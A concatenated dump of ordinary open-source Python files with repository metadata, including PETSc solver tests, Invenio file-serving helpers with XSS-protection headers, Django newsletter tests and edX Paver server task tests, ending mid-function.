pc = ksp.getPC()
ksp.setType('cg')
pc.setType('none')
ksp.setOperators(AM,AM)
ksp.solve(b,u)
print u.array, ksp.its
u, b = AM.getVecs()
b.set(1)
b = (A+M)*b
u.set(0)
kspS = PETSc.KSP()
kspS.create(comm=PETSc.COMM_WORLD)
pcS = kspS.getPC()
kspS.setType('cg')
pcS.setType('none')
P = PETSc.Mat().createPython([A.size[0], A.size[0]])
P.setType('python')
p = cg.SplitMulti(A,M)
P.setPythonContext(p)
kspS.setOperators(P)
kspS.solve(b,u)
print u.array, ksp.its
|
wathen/PhD
|
MHD/FEniCS/MHD/Stabilised/SaddlePointForm/Test/SplitCG/test.py
|
Python
|
mit
| 1,007
|
from FireGirlPathway import *
#create new Pathway, id=0, default policy, default as FireGirlPathway
ls = FireGirlPathway(0)
ls.generateNewPathway()
print '{0:6} {1:12} {2:12} {3:12} {4:12} {5:12} {6:12}'.format(
'Year', 'Choice', 'Cells Brnd', 'Timb Loss', 'Sup. Cost', 'Harvest Totl', 'Growth Totl')
for y in range(500):
ls.doOneYear()
choice = ls.ignitions[y].getChoice()
#'timber loss', 'cells burned', 'suppression cost', 'burn time'
outcomes = ls.ignitions[y].getOutcomes()
supcost = ls.yearly_suppression_costs
growth = ls.yearly_growth_totals[y]
harvest = ls.yearly_logging_totals[y]
print '{0:3} {1:12} {2:12} {3:12} {4:12} {5:12} {6:12}'.format(
y, choice, round(outcomes[1]), round(outcomes[0]), round(outcomes[2]), round(harvest), round(growth))
#supcost = ls.ignitions[y].getSuppressionTotal()
#harvest = ls.ignitions[y].getHarvestTotal()
#'{0:12.3f} {1:12.3f} {2:12.3f}'.format(arg1, arg2, arg3)
|
smcgregor/gravity
|
test_script_pathway_models.py
|
Python
|
mpl-2.0
| 976
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2019 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""File serving helpers for Files REST API."""
import mimetypes
import hashlib
import os
import unicodedata
import warnings
from flask import current_app, make_response, request
from time import time
from urllib.parse import urlsplit
from werkzeug.datastructures import Headers
from werkzeug.urls import url_quote
from werkzeug.wsgi import FileWrapper
MIMETYPE_TEXTFILES = {
'readme'
}
MIMETYPE_WHITELIST = {
'audio/mpeg',
'audio/ogg',
'audio/wav',
'audio/webm',
'image/gif',
'image/jpeg',
'image/png',
'image/tiff',
'text/plain',
}
"""List of whitelisted MIME types.
.. warning::
Do not add new types to this list unless you know what you are doing. You
could potentially open up for XSS attacks.
"""
MIMETYPE_PLAINTEXT = {
'application/javascript',
'application/json',
'application/xhtml+xml',
'application/xml',
'text/css',
'text/csv',
'text/html',
'image/svg+xml',
}
def chunk_size_or_default(chunk_size):
"""Use default chunksize if not configured."""
return chunk_size or 5 * 1024 * 1024 # 5MiB
def send_stream(stream, filename, size, mtime, mimetype=None, restricted=True,
as_attachment=False, etag=None, content_md5=None,
chunk_size=None, conditional=True, trusted=False):
"""Send the contents of a file to the client.
.. warning::
It is very easy to be exposed to Cross-Site Scripting (XSS) attacks if
you serve user uploaded files. Here are some recommendations:
1. Serve user uploaded files from a separate domain
(not a subdomain). This way a malicious file can only attack
other user uploaded files.
2. Prevent the browser from rendering and executing HTML files (by
setting ``trusted=False``).
3. Force the browser to download the file as an attachment
(``as_attachment=True``).
:param stream: The file stream to send.
:param filename: The file name.
:param size: The file size.
:param mtime: A Unix timestamp that represents last modified time (UTC).
:param mimetype: The file mimetype. If ``None``, the module will try to
guess. (Default: ``None``)
:param restricted: If the file is not restricted, the module will set the
cache-control. (Default: ``True``)
:param as_attachment: If the file is an attachment. (Default: ``False``)
:param etag: If defined, it will be set as HTTP E-Tag.
:param content_md5: If defined, a HTTP Content-MD5 header will be set.
:param chunk_size: The chunk size.
:param conditional: Make the response conditional to the request.
(Default: ``True``)
:param trusted: Do not enable this option unless you know what you are
doing. By default this function will send HTTP headers and MIME types
that prevents your browser from rendering e.g. a HTML file which could
contain a malicious script tag.
(Default: ``False``)
:returns: A Flask response instance.
"""
chunk_size = chunk_size_or_default(chunk_size)
# Guess mimetype from filename if not provided.
if mimetype is None and filename:
mimetype = mimetypes.guess_type(filename)[0]
if mimetype is None:
mimetype = 'application/octet-stream'
# Construct headers
headers = Headers()
headers['Content-Length'] = size
if content_md5:
headers['Content-MD5'] = content_md5
if not trusted:
# Sanitize MIME type
mimetype = sanitize_mimetype(mimetype, filename=filename)
# See https://www.owasp.org/index.php/OWASP_Secure_Headers_Project
# Prevent JavaScript execution
headers['Content-Security-Policy'] = "default-src 'none';"
# Prevent MIME type sniffing for browser.
headers['X-Content-Type-Options'] = 'nosniff'
# Prevent opening of downloaded file by IE
headers['X-Download-Options'] = 'noopen'
# Prevent cross domain requests from Flash/Acrobat.
headers['X-Permitted-Cross-Domain-Policies'] = 'none'
# Prevent files from being embedded in frame, iframe and object tags.
headers['X-Frame-Options'] = 'deny'
# Enable XSS protection (IE, Chrome, Safari)
headers['X-XSS-Protection'] = '1; mode=block'
# Force Content-Disposition for application/octet-stream to prevent
# Content-Type sniffing.
if as_attachment or mimetype == 'application/octet-stream':
# See https://github.com/pallets/flask/commit/0049922f2e690a6d
try:
filenames = {'filename': filename.encode('latin-1')}
except UnicodeEncodeError:
filenames = {'filename*': "UTF-8''%s" % url_quote(filename)}
encoded_filename = (unicodedata.normalize('NFKD', filename)
.encode('latin-1', 'ignore'))
if encoded_filename:
filenames['filename'] = encoded_filename
headers.add('Content-Disposition', 'attachment', **filenames)
else:
headers.add('Content-Disposition', 'inline')
# Construct response object.
rv = current_app.response_class(
FileWrapper(stream, buffer_size=chunk_size),
mimetype=mimetype,
headers=headers,
direct_passthrough=True,
)
# Set etag if defined
if etag:
rv.set_etag(etag)
# Set last modified time
if mtime is not None:
rv.last_modified = int(mtime)
# Set cache-control
if not restricted:
rv.cache_control.public = True
cache_timeout = current_app.get_send_file_max_age(filename)
if cache_timeout is not None:
rv.cache_control.max_age = cache_timeout
rv.expires = int(time() + cache_timeout)
if conditional:
rv = rv.make_conditional(request)
return rv
def sanitize_mimetype(mimetype, filename=None):
"""Sanitize a MIME type so the browser does not render the file."""
# Allow some few mime type like plain text, images and audio.
if mimetype in MIMETYPE_WHITELIST:
return mimetype
# Rewrite HTML, JavaScript, CSS etc to text/plain.
if mimetype in MIMETYPE_PLAINTEXT or \
(filename and filename.lower() in MIMETYPE_TEXTFILES):
return 'text/plain'
# Default
return 'application/octet-stream'
def make_path(base_uri, path, filename, path_dimensions, split_length):
"""Generate a path as base location for file instance.
:param base_uri: The base URI.
:param path: The relative path.
:param path_dimensions: Number of chunks the path should be split into.
:param split_length: The length of any chunk.
:returns: A string representing the full path.
"""
assert len(path) > path_dimensions * split_length
uri_parts = []
for i in range(path_dimensions):
uri_parts.append(path[0:split_length])
path = path[split_length:]
uri_parts.append(path)
uri_parts.append(filename)
return os.path.join(base_uri, *uri_parts)
def compute_md5_checksum(stream, **kwargs):
"""Get helper method to compute MD5 checksum from a stream.
:param stream: The input stream.
:returns: The MD5 checksum.
"""
return compute_checksum(stream, 'md5', hashlib.md5(), **kwargs)
def compute_checksum(stream, algo, message_digest, chunk_size=None,
progress_callback=None):
"""Get helper method to compute checksum from a stream.
:param stream: File-like object.
:param algo: Identifier for checksum algorithm.
:param messsage_digest: A message digest instance.
:param chunk_size: Read at most size bytes from the file at a time.
:param progress_callback: Function accepting one argument with number
of bytes read. (Default: ``None``)
:returns: The checksum.
"""
chunk_size = chunk_size_or_default(chunk_size)
bytes_read = 0
while 1:
chunk = stream.read(chunk_size)
if not chunk:
if progress_callback:
progress_callback(bytes_read)
break
message_digest.update(chunk)
bytes_read += len(chunk)
if progress_callback:
progress_callback(bytes_read)
return "{0}:{1}".format(algo, message_digest.hexdigest())
def populate_from_path(bucket, source, checksum=True, key_prefix='',
chunk_size=None):
"""Populate a ``bucket`` from all files in path.
:param bucket: The bucket (instance or id) to create the object in.
:param source: The file or directory path.
:param checksum: If ``True`` then a MD5 checksum will be computed for each
file. (Default: ``True``)
:param key_prefix: The key prefix for the bucket.
:param chunk_size: Chunk size to read from file.
:returns: A iterator for all
:class:`invenio_files_rest.models.ObjectVersion` instances.
"""
from .models import FileInstance, ObjectVersion
def create_file(key, path):
"""Create new ``ObjectVersion`` from path or existing ``FileInstance``.
It checks MD5 checksum and size of existing ``FileInstance``s.
"""
key = key_prefix + key
if checksum:
file_checksum = compute_md5_checksum(
open(path, 'rb'), chunk_size=chunk_size)
file_instance = FileInstance.query.filter_by(
checksum=file_checksum, size=os.path.getsize(path)
).first()
if file_instance:
return ObjectVersion.create(
bucket, key, _file_id=file_instance.id
)
return ObjectVersion.create(bucket, key, stream=open(path, 'rb'))
if os.path.isfile(source):
yield create_file(os.path.basename(source), source)
else:
for root, dirs, files in os.walk(source, topdown=False):
for name in files:
filename = os.path.join(root, name)
assert filename.startswith(source)
parts = [p for p in filename[len(source):].split(os.sep) if p]
yield create_file('/'.join(parts), os.path.join(root, name))
def create_file_streaming_redirect_response(obj):
"""Redirect response generating function."""
warnings.warn('This streaming does not support multiple storage backends.')
response = make_response()
redirect_url_base = '/user_files/'
redirect_url_key = urlsplit(obj.file.uri).path
response.headers['X-Accel-Redirect'] = redirect_url_base + \
redirect_url_key[1:]
return response
|
inveniosoftware/invenio-files-rest
|
invenio_files_rest/helpers.py
|
Python
|
mit
| 10,805
|
from django.test import TestCase
from mock import patch
from news.backends.common import NewsletterException
from news.models import Newsletter
from news.tasks import confirm_user, mogrify_message_id, send_message
class TestSendMessage(TestCase):
@patch('news.tasks.ExactTarget')
def test_caching_bad_message_ids(self, mock_ExactTarget):
"""Bad message IDs are cached so we don't try to send to them again"""
mock_et = mock_ExactTarget()
exc = NewsletterException()
exc.message = 'Invalid Customer Key'
mock_et.trigger_send.side_effect = exc
message_id = "MESSAGE_ID"
for i in range(10):
send_message(message_id, 'email', 'token', 'format')
mock_et.trigger_send.assert_called_once_with('MESSAGE_ID', {
'EMAIL_ADDRESS_': 'email',
'TOKEN': 'token',
'EMAIL_FORMAT_': 'format',
})
class TestSendWelcomes(TestCase):
def test_mogrify_message_id_text(self):
"""Test adding lang and text format to message ID"""
result = mogrify_message_id("MESSAGE", "en", "T")
expect = "en_MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_html(self):
"""Test adding lang and html format to message ID"""
result = mogrify_message_id("MESSAGE", "en", "H")
expect = "en_MESSAGE"
self.assertEqual(expect, result)
def test_mogrify_message_id_no_lang(self):
"""Test adding no lang and format to message ID"""
result = mogrify_message_id("MESSAGE", None, "T")
expect = "MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_long_lang(self):
"""Test adding long lang and format to message ID"""
result = mogrify_message_id("MESSAGE", "en-US", "T")
expect = "en_MESSAGE_T"
self.assertEqual(expect, result)
def test_mogrify_message_id_upcase_lang(self):
"""Test adding uppercase lang and format to message ID"""
result = mogrify_message_id("MESSAGE", "FR", "T")
expect = "fr_MESSAGE_T"
self.assertEqual(expect, result)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_text_welcome(self, apply_updates, send_message):
"""Test sending the right welcome message"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'ru'
format = 'T'
# User who prefers Russian Text messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
expected_welcome = "%s_%s_%s" % (lang, welcome, format)
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_html_welcome(self, apply_updates, send_message):
"""Test sending the right welcome message"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'RU' # This guy had an uppercase lang code for some reason
format = 'H'
# User who prefers Russian HTML messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# Lang code is lowercased. And we don't append anything for HTML.
expected_welcome = "%s_%s" % (lang.lower(), welcome)
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_bad_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in english if user wants a lang that
our newsletter doesn't support"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'fr'
format = 'H'
# User who prefers French HTML messages
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting English. And we don't append anything for HTML.
expected_welcome = "en_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_long_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in pt if the user wants pt and the newsletter
supports pt-Br"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru,pt-Br',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting pt. And we don't append anything for HTML.
expected_welcome = "pt_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_other_long_lang_welcome(self, apply_updates, send_message):
"""Test sending welcome in pt if the user wants pt-Br and the
newsletter supports pt"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en,ru,pt',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt-Br'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
# They're getting pt. And we don't append anything for HTML.
expected_welcome = "pt_%s" % welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
@patch('news.tasks.send_message')
@patch('news.tasks.apply_updates')
def test_one_lang_welcome(self, apply_updates, send_message):
"""If a newsletter only has one language, the welcome message
still gets a language prefix"""
welcome = u'welcome'
Newsletter.objects.create(
slug='slug',
vendor_id='VENDOR',
welcome=welcome,
languages='en',
)
token = "TOKEN"
email = 'dude@example.com'
lang = 'pt-Br'
format = 'H'
user_data = {
'status': 'ok',
'confirmed': False,
'newsletters': ['slug'],
'format': format,
'lang': lang,
'token': token,
'email': email,
}
confirm_user(token, user_data)
expected_welcome = 'en_' + welcome
send_message.delay.assert_called_with(expected_welcome, email, token, format)
|
pmclanahan/basket
|
news/tests/test_send_welcomes.py
|
Python
|
mpl-2.0
| 8,291
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import numpy as np
def get_var_and_memory_size(block, var_name, batch_size=None):
var = block._find_var_recursive(var_name)
assert var is not None, "Variable {} cannot be found".format(var_name)
assert var.type == core.VarDesc.VarType.LOD_TENSOR, "Variable {} is not Tensor".format(
var_name)
shape = list(var.shape)
if not shape:
return var, 0
has_none = False
for i, s in enumerate(shape):
if s is None or s < 0:
assert not has_none
shape[i] = batch_size
has_none = True
assert all(
[s >= 0 for s in shape]), "shape {} is not deterministic".format(shape)
mem_size = int(np.prod(shape)) * core.size_of_dtype(var.dtype)
return var, mem_size
def pre_allocate_memory(size, place):
t = core.LoDTensor()
t._set_dims([size])
t._mutable_data(place, core.VarDesc.VarType.INT8)
del t
# NOTE: does not consider inplace yet.
def get_max_memory_info(program, batch_size=None):
assert program.num_blocks == 1, "only support to analysis program with only one block"
cur_tmp_mem = 0
max_tmp_mem = 0
max_persistable_mem = 0
visited_vars = set()
alived_vars = []
block = program.global_block()
gc_vars = core._get_eager_deletion_vars(program.desc, [])[0]
for i, op in enumerate(block.ops):
var_names = op.input_arg_names + op.output_arg_names
for var_name in var_names:
if var_name in visited_vars:
continue
visited_vars.add(var_name)
var, mem_size = get_var_and_memory_size(block, var_name, batch_size)
if var.persistable:
max_persistable_mem += mem_size
else:
cur_tmp_mem += mem_size
max_tmp_mem = max(max_tmp_mem, cur_tmp_mem)
cur_gc_vars = gc_vars[i]
for var_name in var_names:
if var_name not in cur_gc_vars:
continue
_, mem_size = get_var_and_memory_size(block, var_name, batch_size)
cur_tmp_mem -= mem_size
return max_tmp_mem, max_persistable_mem
|
luotao1/Paddle
|
python/paddle/fluid/memory_analysis.py
|
Python
|
apache-2.0
| 2,753
|
#!/usr/bin/env python
#
# Copyright 2017 the original author or authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from lxml import etree
import structlog
from netconf.nc_rpc.rpc import Rpc
import netconf.nc_common.error as ncerror
log = structlog.get_logger()
class Lock(Rpc):
def __init__(self, request, request_xml, grpc_client, session,
capabilities):
super(Lock, self).__init__(request, request_xml, grpc_client,
session, capabilities)
self._validate_parameters()
def execute(self):
log.info('Lock-request', session=self.session.session_id)
if self.rpc_response.is_error:
return self.rpc_response
def _validate_parameters(self):
log.info('validate-parameters', session=self.session.session_id)
|
opencord/voltha
|
netconf/nc_rpc/base/lock.py
|
Python
|
apache-2.0
| 1,327
|
# this example uses a csv file with the datas for the classification
# we retreive the sample from the file sample.csv
path = os.path.abspath(os.path.dirname(__file__))
dataInOut = Sample().ImportFromCSVFile(path + "/sample.csv")
# we create dataIn and dataOut
dataIn = Sample(861, 2)
dataOut = Sample(861, 1)
# we build the input Sample and the output Sample because we must separate
# dataInOut
for i in range(861):
a = dataInOut[i]
b = Point(2)
b[0] = a[1]
b[1] = a[2]
dataIn[i] = b
dataOut[i] = int(a[0])
# list of C parameter
cp = [0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]
# list of gamma parameter in kernel function
gamma = [0.000001, 0.00001, 0.0001, 0.001, 0.01, 0.1, 1, 10, 100]
# create the Classification Problem
Regression = LibSVMClassification(dataIn, dataOut)
Regression.setKernelType(LibSVM.NormalRbf)
Regression.setTradeoffFactor(cp)
Regression.setKernelParameter(gamma)
# compute the classification
Regression.run()
print "#######################"
print "Results with Samples I/O"
print "Accuracy(p.c.)=", Regression.getAccuracy()
|
openturns/otsvm
|
python/test/t_example2.py
|
Python
|
lgpl-3.0
| 1,095
|
import pytest
from click.testing import CliRunner
from coolcommands import cli
@pytest.fixture
def runner():
return CliRunner()
def test_cli(runner):
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert not result.exception
assert result.output.strip() == 'Hello, world.'
def test_cli_with_option(runner):
result = runner.invoke(cli.main, ['--as-cowboy'])
assert not result.exception
assert result.exit_code == 0
assert result.output.strip() == 'Howdy, world.'
def test_cli_with_arg(runner):
result = runner.invoke(cli.main, ['Bradley'])
assert result.exit_code == 0
assert not result.exception
assert result.output.strip() == 'Hello, Bradley.'
|
bradleybossard/cool-cli-tool
|
tests/test_cli.py
|
Python
|
apache-2.0
| 721
|
from __future__ import unicode_literals
import frappe
from frappe.utils.verified_command import verify_request
from frappe.email.doctype.newsletter.newsletter import confirmed_unsubscribe
no_cache = True
def get_context(context):
frappe.flags.ignore_permissions = True
# Called for confirmation.
if "email" in frappe.form_dict:
if verify_request():
user_email = frappe.form_dict["email"]
context.email = user_email
title = frappe.form_dict["name"]
context.email_groups = get_email_groups(user_email)
context.current_group = get_current_groups(title)
context.status = "waiting_for_confirmation"
# Called when form is submitted.
elif "user_email" in frappe.form_dict:
context.status = "unsubscribed"
email = frappe.form_dict['user_email']
email_group = get_email_groups(email)
for group in email_group:
if group.email_group in frappe.form_dict:
confirmed_unsubscribe(email, group.email_group)
# Called on Invalid or unsigned request.
else:
context.status = "invalid"
def get_email_groups(user_email):
# Return the all email_groups in which the email has been registered.
return frappe.get_all("Email Group Member",
fields=["email_group"],
filters={"email": user_email, "unsubscribed": 0})
def get_current_groups(name):
# Return current group by which the mail has been sent.
return frappe.db.get_all("Newsletter Email Group",
fields=["email_group"],
filters={"parent":name, "parenttype":"Newsletter"})
|
vjFaLk/frappe
|
frappe/www/unsubscribe.py
|
Python
|
mit
| 1,462
|
#!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
# Additional basic list exercises
# D. Given a list of numbers, return a list where
# all adjacent == elements have been reduced to a single element,
# so [1, 2, 2, 3] returns [1, 2, 3]. You may create a new list or
# modify the passed in list.
def remove_adjacent(nums):
# +++your code here+++
return
# E. Given two lists sorted in increasing order, create and return a merged
# list of all the elements in sorted order. You may modify the passed in lists.
# Ideally, the solution should work in "linear" time, making a single
# pass of both lists.
def linear_merge(list1, list2):
# +++your code here+++
return
# Note: the solution above is kind of cute, but unforunately list.pop(0)
# is not constant time with the standard python list implementation, so
# the above is not strictly linear time.
# An alternate approach uses pop(-1) to remove the endmost elements
# from each list, building a solution list which is backwards.
# Then use reversed() to put the result back in the correct order. That
# solution works in linear time, but is more ugly.
# Simple provided test() function used in main() to print
# what each function returns vs. what it's supposed to return.
def test(got, expected):
if got == expected:
prefix = ' OK '
else:
prefix = ' X '
print('%s got: %s expected: %s' % (prefix, repr(got), repr(expected)))
# Calls the above functions with interesting inputs.
def main():
print('remove_adjacent')
test(remove_adjacent([1, 2, 2, 3]), [1, 2, 3])
test(remove_adjacent([2, 2, 3, 3, 3]), [2, 3])
test(remove_adjacent([]), [])
print()
print('linear_merge')
test(linear_merge(['aa', 'xx', 'zz'], ['bb', 'cc']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'xx'], ['bb', 'cc', 'zz']),
['aa', 'bb', 'cc', 'xx', 'zz'])
test(linear_merge(['aa', 'aa'], ['aa', 'bb', 'bb']),
['aa', 'aa', 'aa', 'bb', 'bb'])
if __name__ == '__main__':
main()
|
plumps/google-python-exercises
|
basic/list2.py
|
Python
|
apache-2.0
| 2,165
|
"""Unit tests for the Paver server tasks."""
import ddt
from paver.easy import call_task
from .utils import PaverTestCase
EXPECTED_COFFEE_COMMAND = (
u"node_modules/.bin/coffee --compile `find {platform_root}/lms "
u"{platform_root}/cms {platform_root}/common -type f -name \"*.coffee\"`"
)
EXPECTED_SASS_COMMAND = (
u"libsass {sass_directory}"
)
EXPECTED_COMMON_SASS_DIRECTORIES = [
u"common/static/sass",
]
EXPECTED_LMS_SASS_DIRECTORIES = [
u"lms/static/sass",
u"lms/static/themed_sass",
u"lms/static/certificates/sass",
]
EXPECTED_CMS_SASS_DIRECTORIES = [
u"cms/static/sass",
]
EXPECTED_PREPROCESS_ASSETS_COMMAND = (
u"python manage.py {system} --settings={asset_settings} preprocess_assets"
u" {system}/static/sass/*.scss {system}/static/themed_sass"
)
EXPECTED_COLLECT_STATIC_COMMAND = (
u"python manage.py {system} --settings={asset_settings} collectstatic --noinput > /dev/null"
)
EXPECTED_CELERY_COMMAND = (
u"python manage.py lms --settings={settings} celery worker --beat --loglevel=INFO --pythonpath=."
)
EXPECTED_RUN_SERVER_COMMAND = (
u"python manage.py {system} --settings={settings} runserver --traceback --pythonpath=. 0.0.0.0:{port}"
)
EXPECTED_INDEX_COURSE_COMMAND = (
u"python manage.py {system} --settings={settings} reindex_course --setup"
)
@ddt.ddt
class TestPaverServerTasks(PaverTestCase):
"""
Test the Paver server tasks.
"""
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"port": 8030}],
)
@ddt.unpack
def test_lms(self, options):
"""
Test the "devstack" task.
"""
self.verify_server_task("lms", options)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"port": 8031}],
)
@ddt.unpack
def test_studio(self, options):
"""
Test the "devstack" task.
"""
self.verify_server_task("studio", options)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset-settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"optimized": True}],
[{"optimized": True, "fast": True}],
[{"no-contracts": True}],
)
@ddt.unpack
def test_devstack(self, server_options):
"""
Test the "devstack" task.
"""
options = server_options.copy()
is_optimized = options.get("optimized", False)
expected_settings = "devstack_optimized" if is_optimized else options.get("settings", "devstack")
# First test with LMS
options["system"] = "lms"
options["expected_messages"] = [
EXPECTED_INDEX_COURSE_COMMAND.format(
system="cms",
settings=expected_settings,
)
]
self.verify_server_task("devstack", options, contracts_default=True)
# Then test with Studio
options["system"] = "cms"
options["expected_messages"] = [
EXPECTED_INDEX_COURSE_COMMAND.format(
system="cms",
settings=expected_settings,
)
]
self.verify_server_task("devstack", options, contracts_default=True)
@ddt.data(
[{}],
[{"settings": "aws"}],
[{"asset_settings": "test_static_optimized"}],
[{"settings": "devstack_optimized", "asset-settings": "test_static_optimized"}],
[{"fast": True}],
[{"optimized": True}],
[{"optimized": True, "fast": True}],
)
@ddt.unpack
def test_run_all_servers(self, options):
"""
Test the "run_all_servers" task.
"""
self.verify_run_all_servers_task(options)
@ddt.data(
[{}],
[{"settings": "aws"}],
)
@ddt.unpack
def test_celery(self, options):
"""
Test the "celery" task.
"""
settings = options.get("settings", "dev_with_worker")
call_task("pavelib.servers.celery", options=options)
self.assertEquals(self.task_messages, [EXPECTED_CELERY_COMMAND.format(settings=settings)])
@ddt.data(
[{}],
[{"settings": "aws"}],
)
@ddt.unpack
def test_update_db(self, options):
"""
Test the "update_db" task.
"""
settings = options.get("settings", "devstack")
call_task("pavelib.servers.update_db", options=options)
db_command = "python manage.py {server} --settings={settings} migrate --traceback --pythonpath=."
self.assertEquals(
self.task_messages,
[
db_command.format(server="lms", settings=settings),
db_command.format(server="cms", settings=settings),
]
)
@ddt.data(
["lms", {}],
["lms", {"settings": "aws"}],
["cms", {}],
["cms", {"settings": "aws"}],
)
@ddt.unpack
def test_check_settings(self, system, options):
"""
Test the "check_settings" task.
"""
settings = options.get("settings", "devstack")
call_task("pavelib.servers.check_settings", args=[system, settings])
self.assertEquals(
self.task_messages,
[
"echo 'import {system}.envs.{settings}' "
"| python manage.py {system} --settings={settings} shell --plain --pythonpath=.".format(
system=system, settings=settings
),
]
)
def verify_server_task(self, task_name, options, contracts_default=False):
"""
Verify the output of a server task.
"""
settings = options.get("settings", None)
asset_settings = options.get("asset-settings", None)
is_optimized = options.get("optimized", False)
is_fast = options.get("fast", False)
no_contracts = options.get("no-contracts", not contracts_default)
if task_name == "devstack":
system = options.get("system")
elif task_name == "studio":
system = "cms"
else:
system = "lms"
port = options.get("port", "8000" if system == "lms" else "8001")
self.reset_task_messages()
if task_name == "devstack":
args = ["studio" if system == "cms" else system]
if settings:
args.append("--settings={settings}".format(settings=settings))
if asset_settings:
args.append("--asset-settings={asset_settings}".format(asset_settings=asset_settings))
if is_optimized:
args.append("--optimized")
if is_fast:
args.append("--fast")
if no_contracts:
args.append("--no-contracts")
call_task("pavelib.servers.devstack", args=args)
else:
call_task("pavelib.servers.{task_name}".format(task_name=task_name), options=options)
expected_messages = options.get("expected_messages", [])
expected_settings = settings if settings else "devstack"
expected_asset_settings = asset_settings if asset_settings else expected_settings
if is_optimized:
expected_settings = "devstack_optimized"
expected_asset_settings = "test_static_optimized"
expected_collect_static = not is_fast and expected_settings != "devstack"
if not is_fast:
expected_messages.append(EXPECTED_PREPROCESS_ASSETS_COMMAND.format(
system=system, asset_settings=expected_asset_settings
))
expected_messages.append(u"xmodule_assets common/static/xmodule")
expected_messages.append(u"install npm_assets")
expected_messages.append(EXPECTED_COFFEE_COMMAND.format(platform_root=self.platform_root))
expected_messages.extend(self.expected_sass_commands(system=system))
if expected_collect_static:
expected_messages.append(EXPECTED_COLLECT_STATIC_COMMAND.format(
system=system, asset_settings=expected_asset_settings
))
expected_run_server_command = EXPECTED_RUN_SERVER_COMMAND.format(
system=system,
settings=expected_settings,
port=port,
)
if not no_contracts:
expected_run_server_command += " --contracts"
expected_messages.append(expected_run_server_command)
self.assertEquals(self.task_messages, expected_messages)
def verify_run_all_servers_task(self, options):
"""
Verify the output of a server task.
"""
settings = options.get("settings", None)
asset_settings = options.get("asset_settings", None)
is_optimized = options.get("optimized", False)
is_fast = options.get("fast", False)
self.reset_task_messages()
call_task("pavelib.servers.run_all_servers", options=options)
expected_settings = settings if settings else "devstack"
expected_asset_settings = asset_settings if asset_settings else expected_settings
if is_optimized:
